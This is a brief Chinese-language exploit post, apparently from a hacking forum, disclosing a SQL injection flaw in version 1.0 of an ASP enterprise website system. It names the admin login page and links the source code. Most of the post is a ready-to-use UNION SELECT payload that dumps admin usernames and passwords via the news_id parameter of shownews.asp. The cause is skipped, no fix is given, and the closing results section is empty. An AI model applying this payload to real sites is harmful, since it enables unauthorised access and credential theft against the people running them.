幻雪企业网站系统 1.0 注入漏洞

作者：hack1990 时间：11-06-16 阅读数：738人阅读

幻雪企业网站源码有新闻动态、集团概况、产业体系、人力资源、招商资源、留言反馈、联系我们等栏目。
后台有新闻动态管理、企业信息管理、产业体系管理、人力资源管理、招商资源管理、留言反馈管理、管理员管理等功能。

后台管理登录：login.asp

源码下载:http://www.mycodes.net/25/4462.htm

漏洞：sql注入成因略。

EXP:
union select 1,2,admin_name,admin_password,5 from admin

test:
http://127.0.0.1/shownews.asp?news_id=5

效果: